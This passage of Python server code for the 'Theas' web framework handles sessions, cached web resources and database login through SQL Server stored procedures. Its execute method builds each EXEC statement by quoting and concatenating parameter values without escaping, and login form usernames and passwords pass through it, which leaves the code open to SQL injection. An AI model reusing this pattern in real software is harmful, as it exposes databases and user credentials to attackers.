# If we've exceeded the "emphatic" count disable this handler.
if self._count >= self._emphatic:
self.disable()
return
def __del__(self):
"""
Python is reclaiming this object, so make sure we are disabled.
"""
self.disable()
return
@property
def count(self):
"""
The number of breaks trapped.
"""
return self._count
@property
def trapped(self):
"""
Whether a break was trapped.
"""
return self._count > 0
class TheasServerError(BaseException):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class TheasServerSQLError(TheasServerError):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def StopServer():
global G_server_is_running
G_server_is_running = False
msg = 'StopServer() called'
ThSession.cls_log('Shutdown', msg)
write_winlog(msg)
# this_ioloop = tornado.ioloop.IOLoop.current()
# this_ioloop.add_callback(this_ioloop.stop)
# def set_exit_handler(func):
# signal.signal(signal.SIGTERM, func)
# def on_exit(signum, frame):
# ThSession.cls_log('Shutdown', 'on_exit() called')
# StopServer()
def do_periodic_callback():
global G_server_is_running
global G_break_handler
# Called by Tornado once a second.
# ThSession.cls_log('Periodic', 'do_periodic_callback() called')
if G_break_handler and G_break_handler.trapped:
# Ctrl-C pressed
G_server_is_running = False
# if msvcrt.kbhit():
# # Any key pressed
# G_server_is_running = False
if not G_server_is_running:
ThSession.cls_log('Periodic', 'Trying to stop IOLoop.instance()')
this_ioloop = tornado.ioloop.IOLoop.current()
this_ioloop.add_callback(this_ioloop.stop)
# tornado.ioloop.IOLoop.current().stop()
# tornado.ioloop.IOLoop.instance().stop()
# tornado.ioloop.IOLoop.instance().add_callback(tornado.ioloop.IOLoop.instance().stop)
class ThStoredProc:
"""#Class ThStoredProc is a helper class that wraps _mssql.MSSQLStoredProcedure.
This allows us to conveniently use the session's SQL connection and to perform session-focused logging.
ThStoredProc also provides parameter sniffing, to simplify working with arbitrary stored procedures
without hard-coding parameter names.
In the future we may want to consider moving theas parameter passing (to the stored procedure) and
updating (for parameters returned by the stored procedure) to ThsStoredProc. (At this point theas
parameters are managed exclusively in ThSession.)
"""
@property
def is_ok(self):
if not FULL_SQL_IS_OK_CHECK:
return True
else:
self.th_session.log('StoredProc', 'Checking is_ok:', self.stored_proc_name)
result = self._storedproc is not None and self.connection is not None and self.connection.connected
if result and FULL_SQL_IS_OK_CHECK:
try:
self.connection.execute_non_query('SELECT 1 AS IsOK')
except:
result = False
if not result:
self.th_session.logged_in = False
self.th_session.sql_conn = None
return result
def __init__(self, this_stored_proc_name, this_th_session):
self._connection = None
self._storedproc = None
self.th_session = None
self.stored_proc_name = None
self.parameter_list = {} # sniffed parameters. See parameters for bound parameters.
self.resultset = []
self.stored_proc_name = this_stored_proc_name
# Use provided session.
self.th_session = this_th_session
self._connection = this_th_session.sql_conn
self.th_session.log('StoredProc', 'Initializing ThStoredProc:', self.stored_proc_name)
if self.th_session.sql_conn is None or not self.th_session.sql_conn.connected:
self.th_session.log('StoredProc', 'New connection', self.stored_proc_name)
self.th_session.init_session()
if self.th_session.sql_conn is not None and self.th_session.sql_conn.connected and self.stored_proc_name:
self.th_session.log('StoredProc', 'Existing connection:', self.stored_proc_name)
self._storedproc = self.th_session.sql_conn.init_procedure(self.stored_proc_name)
else:
self._storedproc = None
def __del__(self):
self._storedproc = None
del self._storedproc
self.th_session = None
del self.th_session
def refresh_parameter_list(self):
self.th_session.log('StoredProc', 'Refreshing parameter list:', self.stored_proc_name)
if self.parameter_list is not None:
self.parameter_list = {}
if self.stored_proc_name is not None and self.th_session is not None and self.th_session.sql_conn is not None and self.th_session.sql_conn.connected:
try:
self.th_session.sql_conn.execute_query(
'EXEC theas.sputilGetParamNames @ObjectName = \'{}\''.format(self.stored_proc_name))
resultset = [row for row in self.th_session.sql_conn]
for row in resultset:
this_param_info = {}
this_param_info['is_output'] = row['is_output']
self.parameter_list[row['ParameterName']] = this_param_info
# self.parameter_list.append(row['ParameterName'])
except Exception as e:
self.th_session.log('Sessions', '***Error accessing SQL connection', e)
self.th_session.sql_conn = None
self.parameter_list = None
# self.th_session.init_session(force_init=True)
# self._storedproc = self.th_session.sql_conn.init_procedure(self.stored_proc_name)
# self.th_session.authenticate(username=None, password=None) #ToDo: need to think about this. Can we safely re-authenticate?
# self.th_session.log('Sessions', '***Cannot automatically log in after failed SQL connection', e.message)
raise
def execute(self, fetch_rows=True):
self.th_session.comments = 'ThStoredProc.execute'
self.th_session.log('StoredProc', 'Executing:', self.stored_proc_name)
_mssql.min_error_severity = 1
this_result = False
if self.is_ok:
self.th_session.do_on_sql_start(self)
try:
# pymssql and/or FreeTDS have a number of limitations.
# a) They do not seem to support output parameters
# b) They truncate input parameters at 8000 characters
# To work around b), we must not use _storedproc.execute, and must instead build our own
# SQL query to execute.
# this_result = self._storedproc.execute(*args, **kwargs)
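# For example (illustrative values), bound parameters such as
#   {'@ResourceCode': 'index', '@AllStaticBlocks': '0'}
# would be serialized by the loop below into:
#   EXEC theas.spgetSysWebResources @ResourceCode='index', @AllStaticBlocks='0'
# (None values are emitted as NULL; all other values are quoted as string literals)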
this_sql = 'EXEC ' + self.stored_proc_name
for this_name, this_value in self.parameters.items():
if isinstance(this_name, str) and this_name.startswith('@'):
this_sql += ' ' + this_name + '='
this_sql += 'NULL' if this_value is None else '\'' + str(this_value) + '\''
this_sql += ', '
if this_sql.endswith(', '):
this_sql = this_sql[:-2]
self.th_session.sql_conn.execute_query(this_sql)
if fetch_rows:
self.resultset = [row for row in self.th_session.sql_conn]
self.th_session.do_on_sql_done(self)
this_result = True
except Exception as e:
if LOGGING_LEVEL:
print(e)
raise e
self.th_session.comments = None
return this_result
# def bind(self, *args, **kwargs):
def bind(self, value, dbtype, param_name=None, output=False, null=False, max_length=-1):
# def bind(self, object value, int dbtype, str param_name=None, int output=False, int null=False, int max_length=-1):
this_result = None
if self._storedproc is not None:
if value is None:
null = True
elif dbtype in (_mssql.SQLCHAR, _mssql.SQLVARCHAR, _mssql.SQLUUID):
value = str(value)
this_result = self._storedproc.bind(value, dbtype, param_name=param_name, output=output, null=null,
max_length=max_length)
return this_result
@property
def connection(self):
return self._storedproc.connection
@property
def name(self):
return self._storedproc.name
@property
def parameters(self):
return self._storedproc.parameters
# -------------------------------------------------
# Global cached resources
# -------------------------------------------------
class ThResource:
"""Class ThResource is to store a single web resource.
A web resource may be an HTML template, an HTML fragment (i.e. a static block), an HTML page, or anything else
to be sent to the browser: .css, .js., .jpg, .img, etc.
A resource may also have flags to help control access and behavior, such as is_public that indicates whether
this resource can be directly served to a browser (versus being for use by the TheasServer only),
render_jinja_template to indicate whether this resource needs to be rendered before sending, etc.
Works with ThCachedResources.
"""
def __init__(self):
self.resource_code = ''
self.filename = ''
self.filetype = ''
self.date_updated = ''
self.data = ''
self.api_stored_proc = None
self.api_async_stored_proc = None
self.api_stored_proc_resultset_str = None
self.is_public = False
self.is_static = False
self.requires_authentication = False
self.render_jinja_template = False
self.skip_xsrf = False
self.exists = True
self.on_before = None
self.on_after = None
self.revision = None
def __del__(self):
self.data = None
class ThCachedResources:
"""Class ThCachedResources is to manage a thread-safe global dictionary for storage of cached web resources
(see ThResource).
It provides a mutex, and methods for locking and unlocking the global dictionary, as well as methods for
loading resources, retrieving resources, and deleting resources (i.e. purging cached resources).
"""
_mutex = Lock()
def lock(self):
self._mutex.acquire()
def unlock(self):
self._mutex.release()
def __init__(self):
self.__resources = {}
self.__static_blocks_dict = {}
self.__resource_versions_dict = {}
self.default_path = G_program_options.settings_path
def __del__(self):
self.lock()
try:
for resource_code in self.__resources:
self.__resources[resource_code] = None
self.__resources = None
del self.__resources
for resource_code in self.__static_blocks_dict:
self.__static_blocks_dict[resource_code] = None
self.__static_blocks_dict = None
del self.__static_blocks_dict
self.__resource_versions_dict = None
del self.__resource_versions_dict
finally:
self.unlock()
@property
def static_blocks_dict(self):
return self.__static_blocks_dict
@static_blocks_dict.setter
def static_blocks_dict(self, new_dict):
self.__static_blocks_dict = new_dict
@property
def resource_versions_dict(self):
return self.__resource_versions_dict
@resource_versions_dict.setter
def resource_versions_dict(self, new_dict):
self.__resource_versions_dict = new_dict
def len(self):
return len(self.__resources)
def add_resource(self, resource_code, resource_dict):
self.lock()
try:
self.__resources[resource_code] = resource_dict
finally:
self.unlock()
def load_resource(self, resource_code, th_session, all_static_blocks=False, sessionless=False, from_filename=None,
is_public=False, is_static=False, get_default_resource=False):
this_resource = None
if from_filename:
# load resource from file
if from_filename.endswith('Theas.js'):
try:
with open(from_filename, 'r') as f:
buf = f.read()
except Exception:
raise TheasServerError('Error while starting the Theas Server: File Theas.js could not be read.')
this_resource = ThResource()
this_resource.resource_code = resource_code
this_resource.filename = from_filename
this_resource.filetype = 'application/javascript'
this_resource.data = buf
this_resource.api_stored_proc = None
this_resource.api_async_stored_proc = None
this_resource.api_stored_proc_resultset_str = None
this_resource.is_public = is_public
this_resource.is_static = is_static
this_resource.requires_authentication = False
self.add_resource(resource_code, this_resource)
else:
raise TheasServerError(
'Error: file {} was requested from the file system, but the server is configured to serve resources only from the database.'.format(
from_filename))
else:
# load resource from database
if th_session is None:
if not sessionless:
assert th_session is not None, 'ThCachedResources: load_resource called without a valid session'
else:
th_session = ThSession(None, sessionless=True)
resource_code = None
if all_static_blocks:
th_session.log('Resource', 'Will load all static resources from the database.')
else:
if resource_code is None or\
resource_code == '~' or\
resource_code == '/' or\
resource_code == '':
th_session.log('Resource',
'No resource_code specified. Will load default resource for this session.')
get_default_resource = 1
else:
th_session.log('Resource', 'ThCachedResources.load_resource fetching from database',
resource_code if resource_code is not None else 'None')
# Get SysWebResourcesdata from database
this_proc = ThStoredProc('theas.spgetSysWebResources', th_session)
if this_proc.is_ok:
# Note: we could check for existence of @GetDefaultResource down below to help with backwards
# compatibility ... but that would mean having to call refresh_parameter_list, which is
# unnecessary overhead.
# this_proc.refresh_parameter_list()
this_proc.bind(resource_code, _mssql.SQLCHAR, '@ResourceCode', null=(resource_code is None))
this_proc.bind(str(int(all_static_blocks)), _mssql.SQLCHAR, '@AllStaticBlocks')
# if '@GetDefaultResource' in this_proc.parameter_list:
this_proc.bind(str(int(get_default_resource)), _mssql.SQLCHAR, '@GetDefaultResource')
proc_result = this_proc.execute(fetch_rows=False)
assert proc_result, 'ThCachedResources.load_resource received error result from call to theas.spgetSysWebResources in the SQL database.'
row_count = 0
this_static_blocks_dict = {}
if this_proc.th_session.sql_conn is not None:
for row in this_proc.th_session.sql_conn:
row_count += 1
buf = row['ResourceText']
if not buf:
buf = row['ResourceData']
if buf:
buf = bytes(buf)
elif not all_static_blocks and buf and '$thInclude_' in buf:
# Perform replacement of includes. Template may include string like:
# $thInclude_MyResourceCode
# This will be replaced with the static block resource having a ResourceCode=MyResourceCode
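# Example (illustrative): a template containing
#   <div>$thInclude_SiteFooter</div>
# has $thInclude_SiteFooter replaced by the cached static block whose
# ResourceCode is SiteFooter; safe_substitute() leaves unknown placeholders untouched.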
tmp = string.Template(buf)
buf = tmp.safe_substitute(G_cached_resources.static_blocks_dict)
this_resource = ThResource()
this_resource.resource_code = row['ResourceCode']
this_resource.filename = row['Filename']
if 'Filetype' in row:
this_resource.filetype = row['Filetype']
if 'DateUpdated' in row:
this_resource.date_updated = row['DateUpdated']
this_resource.data = buf
this_resource.api_stored_proc = row['APIStoredProc']
this_resource.api_async_stored_proc = row['APIAsyncStoredProc']
this_resource.api_stored_proc_resultset_str = row['ResourceResultsets']
this_resource.is_public = row['IsPublic']
this_resource.is_static = row['IsStaticBlock']
this_resource.requires_authentication = row['RequiresAuthentication']
this_resource.render_jinja_template = row['RenderJinjaTemplate']
this_resource.skip_xsrf = row['SkipXSRF']
if 'OnBefore' in row:
this_resource.on_before = row['OnBefore']
if 'OnAfter' in row:
this_resource.on_after = row['OnAfter']
if 'Revision' in row:
this_resource.revision = row['Revision']
if this_resource.resource_code and \
this_resource.resource_code != '~': # added 2/11/2019: don't want to cache default resource
self.add_resource(row['ResourceCode'], this_resource)
if all_static_blocks:
this_static_blocks_dict['//thInclude_' + row['ResourceCode']] = buf
this_static_blocks_dict['thInclude_' + row['ResourceCode']] = buf
if resource_code and resource_code != '~' and row_count == 0:
# do negative cache
this_resource = ThResource()
this_resource.exists = False
self.add_resource(resource_code, this_resource)
if all_static_blocks:
ThCachedResources.static_blocks_dict = this_static_blocks_dict
have_next_resultset = this_proc.th_session.sql_conn.nextresult()
if have_next_resultset:
for row in this_proc.th_session.sql_conn:
# note: should only be one row
row_count += 1
buf = row['JSON_CurResourceRevisions']
ThCachedResources.resource_versions_dict = dict(
(v["ResourceCode"], v) for v in json.loads(buf))
this_proc = None
del this_proc
return this_resource
def delete_resource(self, resource_code=None, delete_all=False):
result = False
if delete_all and len(self.__resources) > 0:
self.lock()
try:
self.__resources.clear()
result = True
finally:
self.unlock()
self.load_global_resources()
elif resource_code is not None and resource_code in self.__resources:
self.lock()
try:
self.__resources[resource_code] = None
del self.__resources[resource_code]
result = True
finally:
self.unlock()
return result
def get_resource(self, resource_code, th_session, for_public_use=False, all_static_blocks=False,
none_if_not_found=True, get_default_resource=False, from_file=None):
global DEFAULT_RESOURCE_CODE
this_resource = None
if resource_code:
resource_code = resource_code.strip()
else:
if th_session is not None:
resource_code = th_session.bookmark_url
if resource_code == '':
resource_code = None
if resource_code is not None and resource_code in self.__resources:
# Cached resource
this_resource = self.__resources[resource_code]
if th_session is not None:
th_session.log('Resource', 'Serving from cache', resource_code)
else:
ThSession.cls_log('Resource', 'Serving from cache', resource_code)
else:
if th_session is not None:
# Load resource (which requires a session)
this_resource = self.load_resource(resource_code, th_session, all_static_blocks,
get_default_resource=get_default_resource)
log_msg = None
if th_session is not None and (this_resource is None or not this_resource.exists):
# if DEFAULT_RESOURCE_CODE:
# resource_code = DEFAULT_RESOURCE_CODE
# this_resource = self.load_resource(resource_code, th_session, all_static_blocks=False)
if resource_code or th_session is not None:
# suppress logging if there is no session and resource_code was not provided, because the caller
# was probably just checking for a cached resource
log_msg = 'Requested resource {} could not be loaded in ThCachedResources.get_resource'.format(
resource_code)
else:
if for_public_use and this_resource is None:
log_msg = 'Requested resource {} could not be loaded in ThCachedResources.get_resource'.format(
resource_code)
if log_msg is not None:
if th_session is not None:
th_session.log('Resource', log_msg)
else:
ThSession.cls_log('Resource', log_msg)
# Careful: we could be getting a cached resource in which case there may not yet be a session, in which
# case we can't update current_resource here! It is up to the caller to update current_resource
if th_session is not None and this_resource is not None and this_resource.exists and this_resource.resource_code != LOGIN_RESOURCE_CODE and this_resource.render_jinja_template:
# we are assuming that only a jinja template page will have a stored procedure / can serve
# as the current resource for a session. (We don't want javascript files and the like
# to be recorded as the current resource.)
th_session.current_resource = this_resource
th_session.theas_page.set_value('th:CurrentPage', this_resource.resource_code)
return this_resource
def load_global_resources(self):
self.load_resource('Theas.js', None, from_filename=self.default_path + 'Theas.js', is_public=True)
self.load_resource(None, None, all_static_blocks=True, sessionless=True)
# -------------------------------------------------
# Global session list
# -------------------------------------------------
class ThSessions:
"""Class ThSessions is to manage a thread-safe global dictionary of active user sessions.
It provides a mutex, and methods for locking and unlocking the global dictionary, as well as methods for
creating, retrieving, and deleting sessions.
It also provides support for a background thread that is responsible for automatically purging expired
sessions.
See class ThSession. (ThSessions manages a dictionary of ThSession objects.)
"""
_mutex = Lock()
def __init__(self):
self.__sessions = {}
self.waiting_for_busy = {}
self.background_thread_running = False
def __del__(self):
self.lock()
try:
for this_session_token in self.__sessions:
if self.__sessions[this_session_token]:
if self.__sessions[this_session_token].sql_conn:
self.__sessions[this_session_token].sql_conn = None
self.__sessions[this_session_token] = None
self.__sessions.clear()
finally:
self.unlock()
def lock(self):
self._mutex.acquire()
def unlock(self):
self._mutex.release()
def stop(self):
self.background_thread_running = False
def __len__(self):
return len(self.__sessions)
def add_session(self, session_token, this_session):
self.lock()
try:
self.__sessions[session_token] = this_session
finally:
self.unlock()
def remove_session(self, session_token):
this_session = None
self.lock()
try:
if session_token in self.__sessions:
this_session = self.__sessions[session_token]
del self.__sessions[session_token]
except Exception:
if LOGGING_LEVEL:
print('Exception in remove_session')
finally:
self.unlock()
return this_session
def remove_all_sessions(self):
self.lock()
try:
for session_token, this_sess in self.__sessions.items():
if this_sess is not None and this_sess.sql_conn is not None:
this_sess.sql_conn.close()
finally:
self.unlock()
def remove_expired(self, remove_all=False):
global G_program_options
self.lock()
try:
expireds = {}
for session_token in self.__sessions:
this_session = self.__sessions[session_token]
if (
remove_all or
this_session is None or
this_session.date_expire is None or
this_session.date_expire < datetime.datetime.now() or
(
G_program_options.sql_timeout > 0 and
this_session.date_sql_timeout is not None and
this_session.date_sql_timeout < datetime.datetime.now()
)
):
expireds[session_token] = this_session
for session_token in expireds:
this_session = expireds[session_token]
self.__sessions[session_token] = None
del self.__sessions[session_token]
if this_session is not None:
del this_session
del expireds
finally:
self.unlock()
@staticmethod
def log(category, *args, severity=10000):
if LOGGING_LEVEL == 1 or 0 > severity >= LOGGING_LEVEL:
print(datetime.datetime.now(), 'ThSessions [{}]'.format(category), *args)
def retrieve_session(self, session_token=None, comments='', do_log=True):
this_sess = None
self.lock()
try:
if session_token and session_token in self.__sessions:
# have existing session
this_sess = self.__sessions[session_token]
if do_log:
this_sess.log('Sessions', 'Trying to retrieve existing session', session_token, comments)
finally:
self.unlock()
return this_sess
def _poll_remove_expired(self):
global G_server_is_running
last_poll = datetime.datetime.now()
while self.background_thread_running and G_server_is_running:
# self.log('PollRemoveExpired', 'Running background_thread_running')
if (datetime.datetime.now() - last_poll).total_seconds() > REMOVE_EXPIRED_THREAD_SLEEP:
last_poll = datetime.datetime.now()
self.log('PollRemoveExpired', 'Sessions at start', len(self.__sessions))
self.remove_expired()
self.log('PollRemoveExpired', 'Sessions at end', len(self.__sessions))
time.sleep(3) # sleep only for 3 seconds so the application can shutdown cleanly when needed
def start_cleanup_thread(self):
if REMOVE_EXPIRED_THREAD_SLEEP:
self.background_thread_running = True
expire_thread = threading.Thread(target=self._poll_remove_expired, name='ThSessions Cleanup')
expire_thread.start()
# -------------------------------------------------
# ThSession
# -------------------------------------------------
class ThSession:
"""Class ThSession manages all aspects of an individual user session.
Each session has a unique session_token, and is stored in a ThSessions object.
Each session also has its own dedicated SQL connection, manages authentication (including rendering the
login screen as needed), tracks elapsed time of individual requests, performs logging, provides locking
to prevent multiple simultaneous requests for the same session, and provides methods for initializing
a new session and for retrieving a session from the global ThSessions object.
ThSession.get_session() currently tries to retrieve a session from the global ThSessions object. In
the future it might make sense to move this retrieval to a method of ThSessions().
"""
def __init__(self, this_session_token, sessionless=False):
self.theas_page = None
self.sql_conn = None
self.log_current_request = True
self.current_handler = None
self.comments = None
self.session_token = None
if sessionless:
self.session_token = str(uuid.uuid4())
else:
self.session_token = this_session_token
self.logged_in = False
self.autologged_in = False
# not a "real" login, but rather indicates a login using LOGIN_AUTO_USER_TOKEN
self.__locked_by = None
self.__date_locked = None
self.__current_resource = None
self.current_template_str = None
self.current_data = None
self.bookmark_url = None
self.next_url = '/'
self.request_count = 0
self.initialized = False
self.date_start = datetime.datetime.now()
self.date_expire = None
self.date_last = None
self.date_last_sql_start = None
self.date_last_sql_done = None
self.date_sql_timeout = None
self.date_request_start = None
self.date_request_done = None
self.history = []
self.component_state = {}
self.log('Session', 'Created new session', self.session_token)
self.date_started = datetime.datetime.now()
self.sql_files_init_done = False
self.current_xsrf_form_html = None
# username holds the username of the currently authenticated user, and will be updated by authenticate()
self.username = None
self.user_token = None
# if set to true, upon successful authenticate the user's token will be saved to a cookie
# for automatic login on future visits
self.remember_user_token = REMEMBER_USER_TOKEN
self.theas_page = theas.Theas(theas_session=self)
@property
def current_resource(self):
return self.__current_resource
@property
def resource_versions(self):
# Return master resource_versions_dict from ThCachedResources to make this available in Theas filters
return ThCachedResources.resource_versions_dict
@current_resource.setter
def current_resource(self, value):
if value is not None and value.render_jinja_template:
if self.__current_resource is None or (value.resource_code != self.__current_resource.resource_code):
self.log('Resource', 'Current_resource changed to: {} Was: {}'.format(value.resource_code,
self.__current_resource.resource_code if self.__current_resource else 'not set'))
self.__current_resource = value
@property
def locked(self):
return False if self.__locked_by is None else True
def release_lock(self, handler=None):
if handler.handler_guid != self.__locked_by:
self.log('Session',
'WARNING: Session release_lock called, but caller does not have the lock. (Requestor={} locked_by={})'.format(
handler.handler_guid, self.__locked_by))
now = time.time()
elapsed = (now - self.__date_locked) * 1000 if self.__date_locked is not None else 0
self.log('Session', 'UNLOCK by handler ({})'.format(handler.handler_guid))
self.log('Timing', 'Session lock duration: {:.2f}ms'.format(elapsed))
self.__locked_by = None
self.__date_locked = None
def get_lock(self, handler=None, handler_guid=None, no_log=False):
result = False
this_handler_guid = None
if handler is not None:
this_handler_guid = handler.handler_guid
if this_handler_guid is None:
this_handler_guid = handler_guid
assert this_handler_guid is not None, 'ThSession.get_lock requires a value for handler_guid (or handler.handler_guid)'
if self.__locked_by == this_handler_guid:
# Requestor already has a lock. Nothing to do.
result = True
else:
this_give_up = False
# while self.__locked_by is not None and self.__locked_by != handler.handler_guid and not this_give_up:
# note: can't really wait for a lock here. Return quickly, and let the caller retry.
if self.__locked_by is not None and self.__locked_by != this_handler_guid and not this_give_up:
this_give_up = True
self.log('Session', 'Waiting for busy session. Wanted by {}'.format(this_handler_guid))
# if self.__date_locked is not None and time.time() - self.__date_locked > 30000:
# self.log('Session', 'Giving up waiting for busy session: killing stuck session wanted by {}'.format(handler.handler_guid))
# if self.sql_conn is not None and\
# self.date_sql_timeout is not None and\
# datetime.datetime.now() > self.date_sql_timeout:
# Still waiting for a response from sql in a different thread. Yuck.
# self.log('Session', 'SQL connection is stuck waiting for a response in a different thread!!!')
#
# # We can't forcibly access this session--not thread-safe to do so. Must abandon.
# this_give_up = True
# self.__date_busy_start = None
# self.sql_conn.cancel() # is likely to crash us / is not thread-safe
# self.sql_conn = None # discard this SQL connection
# self.logged_in = False # without a SQL connection we will need to re-authenticate
# this_sess.logout()
# G_sessions.remove_session(self.session_token)
# this_sess = None
# Note: We expect this code to be run in a separate thread. If it is run in the main thread, it will
# never be able to access the busy session (because the main thread will just be running this loop and
# will never be allowed to release the other lock on the session.)
if not this_give_up:
result = True
self.__locked_by = this_handler_guid
self.__date_locked = time.time()
self.request_count += 1
if not no_log:
self.log('Session', 'LOCK obtained by handler ({})'.format(self.__locked_by))
return result
def __del__(self):
if self.theas_page is not None:
self.theas_page = None
del self.theas_page
if self.sql_conn is not None:
if self.sql_conn.connected:
self.sql_conn.close()
self.sql_conn = None
del self.sql_conn
@classmethod
def cls_log(cls, category, *args, severity=10000):
if LOGGING_LEVEL == 1 or 0 > severity >= LOGGING_LEVEL:
print(datetime.datetime.now(), 'ThSessions [' + category + ']:', *args)
@classmethod
def get_session(cls, retrieve_from_db=False, inhibit_create=False,
comments=None, defer_sql=False, do_log=True, session_token=None, handler_guid=None):
global G_sessions
# Retrieve or create a session as needed.
# See if requestor provided a session token (in cookie, URI, or form field). If so, look up in global
# list of sessions. If no session token or session is not in list, create a new session.
date_start = datetime.datetime.now()
this_sess = None
lock_succeeded = False # indicates we received a lock
failed_to_lock = False # indicates we attempted a lock, but failed
if session_token:
# try to retrieve the session from the global list
this_sess = G_sessions.retrieve_session(session_token, comments=comments, do_log=do_log)
if this_sess is not None:
this_sess.log('Session', 'Obtained existing session', this_sess.session_token)
lock_succeeded = this_sess.get_lock(handler_guid=handler_guid)
if not lock_succeeded:
this_sess = None
failed_to_lock = True
if this_sess is not None:
this_sess.log_current_request = do_log
this_sess.comments = comments
elif not failed_to_lock:
if inhibit_create:
# not allowed to start new session
cls.cls_log('Sessions', 'Need to create new session, but inhibit_create prevents new session')
else:
# start new session
session_token = str(uuid.uuid4())
this_sess = ThSession(session_token)
#if USE_SECURE_COOKIES:
# secval = tornado.web.create_signed_value(COOKIE_SECRET, SESSION_COOKIE_NAME, session_token)
# this_sess.theas_page.set_value(SESSION_COOKIE_NAME, secval)
#else:
# this_sess.theas_page.set_value(SESSION_COOKIE_NAME, session_token)
this_sess.log_current_request = do_log
G_sessions.add_session(session_token, this_sess)
this_sess.log('Sessions', 'Active session count', len(G_sessions))
# get lock on the new session
lock_succeeded = this_sess.get_lock(handler_guid=handler_guid)
if not lock_succeeded:
this_sess = None
failed_to_lock = True
# we should now always have a session unless inhibit_create==True
# assert this_sess is not None and this_sess.get_lock(handler=handler, no_log=True), 'Could not obtain session in ThSession.get_session'
if this_sess is not None:
this_sess.date_request_start = date_start
this_sess.date_expire = datetime.datetime.now() + datetime.timedelta(minutes=SESSION_MAX_IDLE)
return this_sess, failed_to_lock
def log(self, category, *args, severity=10000):
if LOGGING_LEVEL == 1 or 0 > severity >= LOGGING_LEVEL:
if self.log_current_request:
# print(datetime.datetime.now(), 'ThSession [{}:{}] ({}) - {} ({})'.format(
print(datetime.datetime.now(), 'ThSession [{}:{}] - {} ({})'.format(
self.session_token,
self.request_count,
# self.__locked_by,
category,
self.comments if self.comments is not None else '',
), *args)
def init_session(self, defer_sql=False, force_init=False):
global G_program_options
global G_sessions
if force_init:
self.sql_conn = None
if force_init or self.sql_conn is None or (self.sql_conn is not None and not self.sql_conn.connected):
defer_sql = False
self.initialized = False
if not defer_sql and (self.sql_conn is None or not self.initialized):
# Establish SQL connection, initialize
if not defer_sql:
if self.sql_conn is None:
self.log('SQL', 'Creating new SQL connection')
try:
self.sql_conn = _mssql.connect(
server=G_program_options.sql_server,
port=G_program_options.sql_port,
user=G_program_options.sql_user,
password=G_program_options.sql_password,
database=G_program_options.sql_database,
appname=G_program_options.sql_appname
)
self.log('SQL', 'FreeTDS version: ' + str(self.sql_conn.tds_version))
except Exception as e:
self.log('SQL', 'Error creating new SQL connection: ' + str(e))
if self.sql_conn is not None:
self.sql_conn.query_timeout = G_program_options.sql_timeout
# Note: we have created a new user session, but the user still needs to be authenticated
self.initialized = True
# make sure session has been initialized to handle uploaded files
if not self.sql_files_init_done:
# Initialize theas session: stored proc returns SQL statements we need to execute
proc = ThStoredProc('theas.spgetInitSession', self) # SOS Agri: must be spInitSession2
if proc.is_ok:
result_value = proc.execute()
for row in proc.resultset:
self.sql_conn.execute_non_query(row['SQLToExecute'])
self.sql_files_init_done = True
if LOGIN_AUTO_USER_TOKEN and not self.logged_in and not self.autologged_in and self.current_handler is not None:
self.log('Auth', 'Authenticating as AUTO user (i.e. public)')
try:
self.authenticate(user_token=LOGIN_AUTO_USER_TOKEN)
except:
self.autologged_in = False
if not self.autologged_in:
self.log('Auth',
'Error: Authentication as AUTO user (i.e. public) FAILED. Is your config file wrong?')
self.log('Auth', 'Bad AUTO user token: {}'.format(LOGIN_AUTO_USER_TOKEN))
return self
def finished(self):
if not self.__locked_by:
pass
else:
self.date_request_done = datetime.datetime.now()
self.current_data = None # clear out data that was used by this request's template
if len(self.history) > 0 and self.history[-1]['PageName'] == self.theas_page.get_value('theas:th:NextPage'):
# self.history[-1]['stepGUID'] = self.get_param('stepGUID')
# self.history[-1]['stepDefID'] = self.get_param('stepDefID')
pass
else:
this_history_entry = {}
this_history_entry['DateRequestDone'] = self.date_request_done
this_history_entry['PageName'] = self.theas_page.get_value('theas:th:NextPage')
# this_history_entry['stepGUID'] = self.get_param('stepGUID')
# this_history_entry['stepDefID'] = self.get_param('stepDefID')
self.history.append(this_history_entry)
self.log('Session', 'Total requests for this session: ', self.request_count)
self.log('Session', 'Finished with this request')
if self.sql_conn is None:
self.log('Session', 'Destroying session')
G_sessions.remove_session(self.session_token)
else:
self.log('Session', 'Will time out at', self.date_expire)
self.log_current_request = True
self.current_handler.cookies_changed = False
self.release_lock(handler=self.current_handler)
def authenticate(self, username=None, password=None, user_token=None, retrieve_existing=False):
"""
:param username: Username of user. If provided, provide password as well
:param password: Password of user. Provide if username is provided
:param user_token: Token for user authentication. May be provided INSTEAD of username and password
:param retrieve_existing: Boolean flag. If set, does not authenticate, but does retrieve existing session
:return: logged_in (boolean), error_message (string)
"""
error_message = ''
self.logged_in = False
result = False
if self.current_handler is not None:
if username is None and password is None and user_token is None and not retrieve_existing:
# caller didn't specify username/password or user-token, so check for a form
# post from the login page
if 'u' in self.current_handler.request.arguments:
username = self.current_handler.get_argument('u')
elif 'theas:Login:UserName' in self.current_handler.request.arguments:
username = self.current_handler.get_argument('theas:Login:UserName')
if 'pw' in self.current_handler.request.arguments:
password = self.current_handler.get_argument('pw')
elif 'theas:Login:Password' in self.current_handler.request.arguments:
password = self.current_handler.get_argument('theas:Login:Password')
# theas:th:RememberUser is a checkbox (which will not be submitted if unchecked)--so default to '0'
temp_remember = '0'
# see if form tells us whether to remember the user
temp_remember_arg = self.current_handler.get_arguments('theas:th:RememberUser')
if len(temp_remember_arg):
temp_remember = temp_remember_arg[0]
self.theas_page.set_value('theas:th:RememberUser', temp_remember)
if self.theas_page:
temp_remember = self.theas_page.get_value('theas:th:RememberUser', auto_create=False)
if temp_remember is not None:
self.remember_user_token = temp_remember == '1'
self.log('Session', 'Attempting authentication')
# The session keeps a copy of the user_name for convenience / to access in templates
self.username = None
# authenticate user into database app
proc = ThStoredProc('theas.spdoAuthenticateUser', self)
if proc.is_ok:
if retrieve_existing:
proc.bind(retrieve_existing, _mssql.SQLVARCHAR, '@RetrieveExisting')
else:
if username is not None:
proc.bind(username, _mssql.SQLVARCHAR, '@UserName')
if password is not None:
proc.bind(password, _mssql.SQLVARCHAR, '@Password')
if user_token is not None:
proc.bind(user_token, _mssql.SQLVARCHAR, '@UserToken')
if self.session_token is not None:
# @SessionToken is informational only: allows the web session to be logged in the database
proc.bind(self.session_token, _mssql.SQLVARCHAR, '@SessionToken')
try:
session_guid = None
result_value = proc.execute()
for row in proc.resultset:
session_guid = row['SessionGUID']
user_token = row['UserToken']
username = row['UserName']
if session_guid is not None:
if user_token == LOGIN_AUTO_USER_TOKEN:
self.logged_in = False
self.autologged_in = True
